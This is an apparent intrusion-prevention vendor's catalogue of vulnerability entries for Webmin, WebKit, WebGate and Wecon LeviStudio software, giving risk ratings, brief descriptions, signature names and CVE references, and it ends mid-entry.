Software:	Generic HTTP server
Type:	Configuration Error
Description:	If the web server is incorrectly configured, it may expose server side scripts and includes instead of executing them properly. These server side scripts may reveal sensitive data, such as authentication data, and may expose the server for an additional attacks.
Situation:	HTTP_CSH-Php-Scripting-In-Client-Request HTTP_CSU-Php-Scripting-In-Client-Request HTTP_SS-Php-Scripting-In-Server-Reply HTTP_Asp-Scripting-In-Server-Reply HTTP_Server-Side-Includes-In-Server-Reply File-Text_Php-Scripting-In-Server-Reply File-Text_Asp-Scripting-In-Server-Reply File-Text_Server-Side-Includes-In-Server-Reply

WebBBS-Webbbs_Config.pl-Followup-Parameter-Shell-Execution

About this vulnerability:

A vulnerability in WebBBS

Risk:

Moderate

First detected in:

sgpkg-ips-1060-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WebBBS

Type:

Input Validation

Description:

There exists a remote command execution vulnerability in WebBBS bulletin board application.

Situation:

HTTP_CRL-WebBBS-Webbbs_Config.pl-Followup-Parameter-Shell-Execution

References:

CVE-2002-1993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1993

WebCalendar-Remote-Code-Injection

About this vulnerability:

A WebCalendar Remote Code Injection vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-706-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WebCalendar

Type:

Code Injection

Description:

A vulnerability in WebCalendar, versions 1.2.4 and before, in the settings.php script which is meant for installation, which allows remote attackers to inject arbitrary code as www-data.

Situation:

HTTP_CS-WebCalendar-Remote-Code-Injection

References:

CVE-2012-1495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1495

BID-53207
http://www.securityfocus.com/bid/53207

OSVDB-81329
http://www.osvdb.org/81329

Webcrossing-WebX-HTTP-POST-Content-Length

About this vulnerability:	A vulnerability in Webcrossing WebX
Risk:	High
First detected in:	sgpkg-ips-415-4219
Last changed:	sgpkg-ips-1584-5242
Platform:	Generic
Software:	Webcrossing WebX
Type:	Input Validation
Description:	A vulnerability in Webcrossing WebX

Webgate-Embedded-Standard-Protocol-Multiple-Buffer-Overflows

About this vulnerability:

Vulnerabilities in WebGate Embedded Standard Protocol (WESP)

Risk:

Moderate

First detected in:

sgpkg-ips-639-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WebGate eDVR Manager; WebGate Control Center; WebGate WebEyeAudio; WebGate WinRDS

Type:

Buffer Overflow

Description:

Multiple stack buffer overflow vulnerabilities exist in multiple products of WebGate. The vulnerabilities are due to insufficient input validation when processing parameters. A remote attacker could exploit these vulnerabilities by enticing a target user to open a crafted web page. Successful exploitation could lead to arbitrary code execution within the context of the browser process.

Situation:

File-Text_Webgate-eDVR-Manager-WESPMonitor-LoadImage-Buffer-Overflow
File-Text_Webgate-Multiple-Products-WESPSerialPortCtrl-Stack-Buffer-Overflow

References:

CVE-2015-2097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2097

OSVDB-118893
http://www.osvdb.org/118893

Webgate-Multiple-Products-Wespplaybackctrl-Two-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in WebGate Control Center

Risk:

Moderate

First detected in:

sgpkg-ips-645-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WebGate Control Center; WebGate eDVR Manager; WebGate WebEyeAudio; WebGate WinRDS

Type:

Buffer Overflow

Description:

Two stack buffer overflow vulnerabilities exist in WebGate Multiple Products. The vulnerabilities are due to insufficient input validation on the length of the parameter passed to the PlaySiteAllChannel() and StopSiteAllChannel() methods of the WESPPLAYBACK.WESPPlaybackCtrl control. A remote attacker could exploit these vulnerabilities by enticing a user into opening a specially crafted web page. Successful exploitation could lead to arbitrary code execution under the security context of the currently logged on user.

Situation:

File-Text_Webgate-Multiple-Products-Wespplaybackctrl-Two-Stack-Buffer-Overflow

References:

CVE-2015-2094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2094

OSVDB-118907
http://www.osvdb.org/118907

Webgate-Wespsdk-Wespdiscovery-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in WebGate Control Center

Risk:

Low

First detected in:

sgpkg-ips-633-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WebGate Control Center; WebGate eDVR Manager; WebGate WebEyeAudio; WebGate WinRDS

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in WebGate WESPSDK that is shipped with multiple WebGate products. The vulnerability is due to a stack buffer overflow in the TCPDiscovery() and TCPDiscovery2() methods of the WESPDiscovery.WESPDiscoveryCtrl ActiveX control. A remote attacker could exploit this vulnerability by enticing a target user to open a crafted web page. Successful exploitation could lead to arbitrary code execution in the context of the browser process.

Situation:

File-Text_Webgate-Wespsdk-Wespdiscovery-Stack-Buffer-Overflow

References:

CVE-2015-2100
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2100

OSVDB-118891
http://www.osvdb.org/118891

WebGrabber-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A WebGrabber ActiveX Control Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-800-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

WebGrabber

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in WebGrabber, version 3.8.2.0, which allows remote attackers to execute arbitrary code via a long string to the GetStatus() method.

Situation:

File-Text_WebGrabber-ActiveX-Control-Buffer-Overflow

References:

OSVDB-64579
http://www.osvdb.org/64579

Webkit-getImageData-Buffer-Overflow-CVE-2018-12293

About this vulnerability:

A vulnerability in WebKit

Risk:

High

First detected in:

sgpkg-ips-1771-5242

Last changed:

sgpkg-ips-1771-5242

Platform:

Generic

Software:

Webkit

Type:

Buffer Overflow

Description:

WebKitGTK+ versions prior to 2.20.3 and WPE WebKit versions prior to 2.20.1 contain a heap buffer overflow vulnerability. A remote attacker can exploit this vulnerability by enticing a user into visiting a maliciously crafted web page.

Situation:

File-Text_Webkit-getImageData-Buffer-Overflow-CVE-2018-12293

References:

CVE-2018-12293
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12293

Webkit-Object-Outline-Memory-Corruption

About this vulnerability:

A vulnerability in Webkit HTML rendering engine

Risk:

High

First detected in:

sgpkg-ips-374-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Safari; Chrome

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Webkit, the HTML rendering engine used in Apple's Safari and Google's Chrome web browsers. The vulnerability is due to memory corruption during the rendering of HTML object outlines. This vulnerability may be exploited by enticing a user to open a specially crafted web page. Exploitation will result in memory corruption which may crash the browser or could lead to arbitrary code execution.

Situation:

HTTP_SS-Webkit-Object-Outline-Memory-Corruption
File-Text_Webkit-Object-Outline-Memory-Corruption

References:

CVE-2010-1813
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1813

BID-43078
http://www.securityfocus.com/bid/43078

Webkit-Use-After-Free-CVE-2017-7042

About this vulnerability:

A vulnerability in WebKit

Risk:

High

First detected in:

sgpkg-ips-1771-5242

Last changed:

sgpkg-ips-1771-5242

Platform:

Generic

Software:

Webkit

Type:

Malfunction

Description:

A use-after-free vulnerability leading to arbitrary code execution or a denial of service condition has been reported in WebKit. iOS before 10.3.3, Safari before 10.1.2, iCloud on Windows before 6.2.2, iTunes on Windows before 12.6.2, and tvOS before 10.2.2 are affected. A remote attacker can exploit this vulnerability by enticing a user into visiting a maliciously crafted web page.

Situation:

File-Text_Webkit-Use-After-Free-CVE-2017-7042

References:

CVE-2017-7042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7042

WebLog-Expert-Denial-of-Service-CVE-2018-7582

About this vulnerability:

A vulnerability in WebLog Expert Web Server

Risk:

High

First detected in:

sgpkg-ips-1321-5242

Last changed:

sgpkg-ips-1321-5242

Platform:

Generic

Software:

WebLog Expert

Type:

Malfunction

Description:

There exists a denial of service vulnerability in WebLog Expert Web Server. The vulnerability is due to improper handling of long HTTP Accept headers.

Situation:

HTTP_CSH-WebLog-Expert-Denial-of-Service-CVE-2018-7582

References:

CVE-2018-7582
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7582

Webmin-Command-Injection-Vulnerability

About this vulnerability:

A vulnerability in Webmin

Risk:

High

First detected in:

sgpkg-ips-1183-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Webmin

Type:

Code Injection

Description:

There exists a command injection vulnerability in Webmin. Successful exploitation can lead in remote code execution.

Situation:

HTTP_CRL-Webmin-Command-Injection-Vulnerability

References:

CVE-2019-15107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15107

Webmin-Command-Shell-Index.cgi-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Webmin Webmin

Risk:

Moderate

First detected in:

sgpkg-ips-1320-5242

Last changed:

sgpkg-ips-1320-5242

Platform:

Generic

Software:

Webmin

Type:

Input Validation

Description:

Insufficient input validation the index.cgi of the Command-Shell module causes a cross-site scripting vulnerability in Webmin. A successful exploit allows an attacker to run arbitrary scripts in a user's browser.

Situation:

HTTP_CS-Webmin-Command-Shell-Index.cgi-Stored-Cross-Site-Scripting

References:

CVE-2020-8821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8821

Webmin-Cross-Site-Scripting-CVE-2018-19191

About this vulnerability:

A vulnerability in Webmin

Risk:

Moderate

First detected in:

sgpkg-ips-1865-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

Webmin

Type:

Cross-site Scripting

Description:

A cross-site scripting vulnerability has been reported in Webmin version 1.890.

Situation:

HTTP_CRL-Webmin-Cross-Site-Scripting-CVE-2018-19191

References:

CVE-2018-19191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19191

Webmin-File-Manager-RCE

About this vulnerability:

A vulnerability in Webmin.

Risk:

High

First detected in:

sgpkg-ips-1525-5242

Last changed:

sgpkg-ips-1525-5242

Platform:

Linux; Unix

Software:

Webmin

Type:

Input Validation

Description:

A vulnerability in Webmin, version 1.984, which allow remote attackers to interact with file manager functionalities such as downloading files from remote URLs and changing file permissions, allowing remote code execution via a crafted .cgi file.

Situation:

HTTP_CRL-Webmin-File-Manager-RCE

References:

CVE-2022-0824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0824

Webmin-File-Parameter-Traversal

About this vulnerability:

A Webmin File Parameter Traversal vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-782-5211

Last changed:

sgpkg-ips-1638-5242

Platform:

Generic

Software:

Webmin

Type:

Directory Traversal

Description:

A vulnerability in Webmin, versions 1.590 and earlier, which allows remote attackers to read arbitrary files via a directory traversal in the file parameter to file/edit_html.cgi.

References:

CVE-2012-2983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2983

BID-55446
http://www.securityfocus.com/bid/55446

OSVDB-85247
http://www.osvdb.org/85247

Webmin-Package-Updates-Remote-Command-Execution

About this vulnerability:

A vulnerability in Webmin

Risk:

High

First detected in:

sgpkg-ips-1194-5242

Last changed:

sgpkg-ips-1499-5242

Platform:

Generic

Software:

Webmin

Type:

Input Validation

Description:

A vulnerability in Webmin, versions 1.910 and before, which allows remote attackers to execute arbitrary code through package-updates/update.cgi due to the lack of input validation. Also covers CVE-2022-36446.

Situation:

HTTP_CRL-Webmin-Package-Updates-Remote-Command-Execution

References:

CVE-2019-12840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12840

Webmin-Password-Change.cgi-Backdoor

About this vulnerability:

A vulnerability in Webmin

Risk:

High

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1825-5242

Platform:

Generic

Software:

Webmin

Type:

Input Validation

Description:

A vulnerability in Webmin, versions 1.890 - 1.920, which allows remote attackers to execute arbitrary code due to the lack of validation of user input.

References:

CVE-2019-15107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15107

Webmin-Show.cgi-Command-Execution

About this vulnerability:

A vulnerability in Webmin Webmin

Risk:

Moderate

First detected in:

sgpkg-ips-493-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Webmin

Type:

Input Validation

Description:

There is a command execution vulnerability in Webmin. The vulnerability is due to insufficient input validation when processing requests sent to "show.cgi" page. A remote, authenticated attacker with access to File Manager module could exploit this vulnerability by sending crafted input to the vulnerable application by including a pipe character "|". Successful exploitation could result in command injecting and execution in the context of the vulnerable application, which is root.

Situation:

HTTP_CRL-Webmin-Show.cgi-Command-Execution

References:

CVE-2012-2982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2982

Webmin-Upload-Authenticated-RCE

About this vulnerability:

A vulnerability in Webmin

Risk:

High

First detected in:

sgpkg-ips-1197-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Webmin

Type:

Input Validation

Description:

A vulnerability in Webmin, versions 1.900 and before, which allows remote attackers to execute arbitrary code by uploading a crafted .cgi file via updown/upload.cgi.

Situation:

HTTP_CS-Webmin-Upload-Authenticated-RCE

References:

CVE-2019-9624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9624

Webmin_Arbitary_File_Disclosure

About this vulnerability:

Arbitary file disclosure vulnerability in Webmin/Usermin

Risk:

Moderate

First detected in:

sgpkg-ips-110-2032

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

Webmin; Usermin

Type:

Input Validation

Description:

There is a file disclosure vulnerability in Webmin and Usermin. An attacker can retrieve files of his choice from the host system, including files that contain sensitive data such as usernames and passwords.

Situation:

HTTP_CSU-Webmin-Arbitary-File-Disclosure

References:

CVE-2006-3392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392

BID-18744
http://www.securityfocus.com/bid/18744

OSVDB-26772
http://www.osvdb.org/26772

WebRTC-Heap-Buffer-Overflow-CVE-2022-2294

About this vulnerability:

An attempt to exploit a vulnerability in WebRTC detected

Risk:

High

First detected in:

sgpkg-ips-1673-5242

Last changed:

sgpkg-ips-1673-5242

Platform:

Generic

Software:

Safari;Chrome

Type:

Malfunction

Description:

A heap buffer overflow has been reported in WebRTC. This issue affects Chrome versions before 103.0.5060.114 and Safari versions up to and including 15.5.

Situation:

File-Text_WebRTC-Heap-Buffer-Overflow-CVE-2022-2294

References:

CVE-2022-2294
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2294

Website-Admin-Console-Access

About this vulnerability:	Website admin console access or access attempt
Risk:	High
First detected in:	sgpkg-ips-533-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	WordPress; phpMyAdmin; Joomla; MODx
Type:	Malfunction
Description:	Several websites and blogs have administrator consoles that allow the site owner to log in to the site and to manage the site's content. Content management systems such, such as WordPress, have default, well-known administrator consoles.
Situation:	HTTP_CSU-MODx-Manager-Console-Access-Attempt HTTP_CSU-Joomla-Administrator-Console-Access-Attempt HTTP_CSU-Phpmyadmin-Console-Access-Attempt HTTP_CSU-Wordpress-Admin-Console-Access-Attempt

Webster-HTTP-Server-Buffer-Overflow

About this vulnerability:

A Webster HTTP Server Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-735-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Webster

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Webster HTTP Server which allows remote attackers to execute arbitrary code via a long URL.

Situation:

HTTP_CSU-Webster-HTTP-Server-Buffer-Overflow

References:

CVE-2002-2268
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2268

BID-6289
http://www.securityfocus.com/bid/6289

OSVDB-44106
http://www.osvdb.org/44106

Websvn-Search-Command-Injection

About this vulnerability:

A vulnerability in WebSVN WebSVN

Risk:

Moderate

First detected in:

sgpkg-ips-1371-5242

Last changed:

sgpkg-ips-1371-5242

Platform:

Generic

Software:

WebSVN

Type:

Input Validation

Description:

Improper validation of parameters received by search.php causes a command njection vulnerability in WebSVN. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Websvn-Search-Command-Injection

References:

CVE-2021-32305
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32305

Webui-Mainfile.php-Arbitrary-Command-Injection

About this vulnerability:

A vulnerability in WebUI WebUI

Risk:

High

First detected in:

sgpkg-ips-657-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WebUI

Type:

Input Validation

Description:

An arbitrary command injection vulnerability exists in WebUI. The vulnerability is due to insufficient validation of multiple parameters in "mainfile.php" when handling HTTP requests. A remote, authenticated attacker can exploit this vulnerability by sending maliciously crafted input to the affected server. This can result in arbitrary command execution with the privileges of the web server process.

Situation:

HTTP_CRL-Webui-Mainfile.php-Arbitrary-Command-Injection

References:

OSVDB-121619
http://www.osvdb.org/121619

Wecon-Levistudio-Address-Name-Heap-Buffer-Overflow

About this vulnerability:	A vulnerability in Wecon LeviStudio
Risk:	Moderate
First detected in:	sgpkg-ips-800-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Wecon LeviStudio
Type:	Buffer Overflow
Description:	Improper validation of XML files results in a heap buffer overflow in Wecon LeviStudio. A successful exploitation allows an attacker to run arbitrary code on the target system.
Situation:	File-TextId_Wecon-Levistudio-Address-Name-Heap-Buffer-Overflow

Wecon-Levistudio-Baseset-Bgonoffbitaddr-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Wecon LeviStudio
Risk:	Moderate
First detected in:	sgpkg-ips-803-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Wecon LeviStudio
Type:	Buffer Overflow
Description:	Insufficient validation of user-provided data results in a stack buffer overflow vulnerability in Wecon LeviStudio. As a result of a successful exploit, an attacker can execute arbitrary code on the target system.
Situation:	File-TextId_Wecon-Levistudio-Baseset-Bgonoffbitaddr-Stack-Buffer-Overflow

Wecon-Levistudio-Comset-Netipaddr-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Wecon LeviStudio

Risk:

Moderate

First detected in:

sgpkg-ips-1178-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Wecon LeviStudio

Type:

Input Validation

Description:

Improper parsing of the ComSet NETIPaddr attribute in XML LeviStudio project files causes a stack buffer overflow vulnerability in Wevon LeviStudio. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

File-TextId_Wecon-Levistudio-Comset-Netipaddr-Stack-Buffer-Overflow

References:

CVE-2019-6537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6537

Wecon-Levistudio-Curscridaddr-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Wecon LeviStudio
Risk:	Moderate
First detected in:	sgpkg-ips-781-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Wecon LeviStudio
Type:	Buffer Overflow
Description:	Improper XML attribute length validation causes a stack buffer overflow vulnerability in Wecon LeviStudio. A successful exploitation allows an attacker to run arbitrary code on the target.
Situation:	File-TextId_Wecon-Levistudio-Curscridaddr-Stack-Buffer-Overflow

Wecon-Levistudio-Datalogtool-Ini-Parser-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Wecon LeviStudio

Risk:

Moderate

First detected in:

sgpkg-ips-1152-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Wecon LeviStudio

Type:

Buffer Overflow

Description:

There has been reported a stack-based buffer overflow vulnerability in WECON LeviStudio DataLogTool. This vulnerability can be exploited by opening a maliciously crafted INI file in DataLogTool. Successful exploitation can lead in arbitrary code execution.

Situation:

File-Text_Wecon-Levistudio-Datalogtool-Ini-Parser-Stack-Based-Buffer-Overflow

References:

CVE-2019-6537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6537

Wecon-Levistudio-Datalogtool-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in WECON LeviStudio DataLogTool

Risk:

High

First detected in:

sgpkg-ips-1152-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Wecon LeviStudio

Type:

Buffer Overflow

Description:

An stack based buffer overflow vulnerability in WECON LeviStudio DataLogTool, versions 1.8.56 and prior, which allows remote attackers to execute arbitrary code by sending a crafted .csv file, due to the improper validation of the length of user-supplied data prior to copying it to a fixed length stack based buffer.

Situation:

File-Text_Wecon-Levistudio-Datalogtool-Stack-Based-Buffer-Overflow

References:

CVE-2019-6537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6537

Wecon-Levistudio-G_BMP-Szfilename-Two-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Wecon LeviStudio
Risk:	Moderate
First detected in:	sgpkg-ips-1232-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Wecon LeviStudio
Type:	Buffer Overflow
Description:	Improper parsing of XML szFilename attribute of the G_BMP element causes a stack buffer overflow in Wecon LeviStudio. A successful exploit may allow an attacker to execute code on the target system with administrator privileges.
Situation:	File-TextId_Wecon-Levistudio-G_BMP-Szfilename-Two-Stack-Buffer-Overflow

Wecon-Levistudio-Hmiset-Type-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Wecon LeviStudio
Risk:	Moderate
First detected in:	sgpkg-ips-776-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Wecon LeviStudio
Type:	Buffer Overflow
Description:	Improper parsing of an XML HmiSetType attribute in project files causes a stack buffer overflow vulnerablity in Wecon LeviStudio. A successful exploitation allows an attacker to execute arbitrary code with the privileges of the user.
Situation:	File-TextId_Wecon-Levistudio-Hmiset-Type-Stack-Buffer-Overflow

Wecon-Levistudio-Installmentset-Installmenttrigaddopen-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Wecon LeviStudio

Risk:

Moderate

First detected in:

sgpkg-ips-1176-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Wecon LeviStudio

Type:

Input Validation

Description:

Improper parsing of XML InstallmentSet InstallmentTrigAddOpen attribute of LeviStudio project files causes a stack buffer overflow vulnerability in Wecon LeviStudio. A successful exploit allows an attacker to execute arbitrary coed on the target system.

Situation:

File-TextId_Wecon-Levistudio-Installmentset-Installmenttrigaddopen-Stack-Buffer-Overflow

References:

CVE-2019-6537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6537

Wecon-Levistudio-MulStatus-Szfilename-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Wecon LeviStudio
Risk:	High
First detected in:	sgpkg-ips-1237-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Wecon LeviStudio
Type:	Buffer Overflow
Description:	There exists a buffer overflow vulnerability in Wecon LeviStudio which allows remote attackers to execute arbitrary code by sending a malicious G_Picture XML file, due to the improper parsing of the szFilename attribute of the MulStatus element.
Situation:	File-TextId_Wecon-Levistudio-MulStatus-Szfilename-Stack-Buffer-Overflow

Wecon-Levistudio-PLC-Type-Heap-Buffer-Overflow

About this vulnerability:	A vulnerability in WECON LeviStudio
Risk:	Moderate
First detected in:	sgpkg-ips-780-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Wecon LeviStudio
Type:	Buffer Overflow
Description:	A heap buffer overflow vulnerability has been reported in WECON LeviStudio. The vulnerability is due to improper parsing of XML PLC Type attribute of LeviStudio project files. A remote attacker could exploit this vulnerability by enticing a user to open a crafted project file. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the user process.
Situation:	File-TextId_Wecon-Levistudio-PLC-Type-Heap-Buffer-Overflow

Wecon-Levistudio-Screeninfo-Scrnname-Heap-Buffer-Overflow

About this vulnerability:	A vulnerability in Wecon LeviStudio
Risk:	Moderate
First detected in:	sgpkg-ips-782-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Wecon LeviStudio
Type:	Buffer Overflow
Description:	Improper XML parsing in Wecon LeviStudio causes a heap buffer overflow vulnerability which can be exploited to gain the ability to execute arbitrary code on the target.
Situation:	File-TextId_Wecon-Levistudio-Screeninfo-Scrnname-Heap-Buffer-Overflow

Wecon-Levistudio-Shortmessage-Module-Smtext-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Wecon LeviStudio
Risk:	Moderate
First detected in:	sgpkg-ips-1223-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Wecon LeviStudio
Type:	Buffer Overflow
Description:	There has been reported a stack buffer overflow in Wecon LeviStudio. Successful exploitation could lead in arbitrary code execution.
Situation:	File-TextId_Wecon-Levistudio-Shortmessage-Module-Smtext-Stack-Buffer-Overflow

Wecon-Levistudio-String-Content-Heap-Buffer-Overflow

About this vulnerability:	A vulnerability in Wecon LeviStudio
Risk:	Moderate
First detected in:	sgpkg-ips-789-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Wecon LeviStudio
Type:	Buffer Overflow
Description:	Improper parsing of XML structures results in a buffer overflow vulnerability in Wecon LeviStudio. A successful exploit allows an attacker to run arbitrary code on the target system.
Situation:	File-TextId_Wecon-Levistudio-String-Content-Heap-Buffer-Overflow

Wecon-LeviStudioU-Address-Mapping-Contraladdr-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Wecon LeviStudioU

Risk:

Moderate

First detected in:

sgpkg-ips-1474-5242

Last changed:

sgpkg-ips-1474-5242

Platform:

Generic

Software:

Wecon LeviStudio

Type:

Buffer Overflow

Description:

Improper validation of the length of attribute value in the SourAddrToDestAddrInfo_UnBuild.xml XML file causes a stack buffer overflow vulnerability in Wecon LeviStudioU. A successful exploit can allow the attacker to execute arbitrary code on the target system.

Situation:

File-TextId_Wecon-LeviStudioU-Address-Mapping-Contraladdr-Stack-Buffer-Overflow

References:

CVE-2021-23138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23138

Wecon-LeviStudioU-Address-Mapping-Digitcount-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Wecon LeviStudioU

Risk:

Moderate

First detected in:

sgpkg-ips-1444-5242

Last changed:

sgpkg-ips-1444-5242

Platform:

Generic

Software:

Wecon LeviStudio

Type:

Buffer Overflow

Description:

Improper validation of the length of attribute value in the SourAddrToDestAddrInfo_UnBuild.xml XML file causes a stack buffer overflow vulnerability in Wecon LeviStudioU. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

File-TextId_Wecon-LeviStudioU-Address-Mapping-Digitcount-Stack-Buffer-Overflow

References:

CVE-2021-23138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23138

Wecon-LeviStudioU-Address-Mapping-Plcaddr-And-Dstaddr-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Wecon LeviStudioU

Risk:

Moderate

First detected in:

sgpkg-ips-1437-5242

Last changed:

sgpkg-ips-1437-5242

Platform:

Generic

Software:

Wecon LeviStudio

Type:

Buffer Overflow

Description:

Improper validation of the length of attribute value in the SourAddrToDestAddrInfo_UnBuild.xml XML file causes a stack buffer overflow vulnerability in Wecon LeviStudioU. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

File-TextId_Wecon-LeviStudioU-Address-Mapping-Plcaddr-And-Dstaddr-Stack-Buffer-Overflow

References:

CVE-2021-23138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23138

Wecon-LeviStudioU-Alarm-Bitaddr-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in WECON LeviStudioU
Risk:	High
First detected in:	sgpkg-ips-1275-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Wecon LeviStudio
Type:	Buffer Overflow
Description:	There exists a buffer overflow vulnerability in WECON LeviStudioU which allows remote attackers to execute arbitrary code due to the insufficient validation of the length of user-supplied data in the Alarm tag of UMP files.
Situation:	File-TextId_Wecon-LeviStudioU-Alarm-Bitaddr-Stack-Buffer-Overflow

Wecon-LeviStudioU-Alarm-Tag-WordAddr-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Wecon LeviStudioU
Risk:	Moderate
First detected in:	sgpkg-ips-1490-5242
Last changed:	sgpkg-ips-1490-5242
Platform:	Generic
Software:	Wecon LeviStudio
Type:	Buffer Overflow
Description:	Improper validation of the length of the WordAddr attribute within the Alarm tag in UMP files causes a stack buffer overflow vulnerability in Wecon LeviStudioU. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation:	File-TextId_Wecon-LeviStudioU-Alarm-Tag-WordAddr-Stack-Buffer-Overflow

Wecon-LeviStudioU-Baseset-Entertime-And-Powerentertime-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Wecon LeviStudioU

Risk:

Moderate

First detected in:

sgpkg-ips-1447-5242

Last changed:

sgpkg-ips-1447-5242

Platform:

Generic

Software:

Wecon LeviStudio

Type:

Buffer Overflow

Description:

Improper validation of the length of user-supplied data in EnterTime and PowerEnterTime attributes within the BaseSet Tag of UMP files causes a stack buffer overflow in Wecon LeviStudioU. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

File-TextId_Wecon-LeviStudioU-Baseset-Entertime-And-Powerentertime-Stack-Buffer-Overflow

References:

CVE-2021-43983
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43983

Wecon-LeviStudioU-Baseset-Hminame-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Wecon LeviStudioU

Risk:

Moderate

First detected in:

sgpkg-ips-1431-5242

Last changed:

sgpkg-ips-1431-5242

Platform:

Generic

Software:

Wecon LeviStudio

Type:

Buffer Overflow

Description:

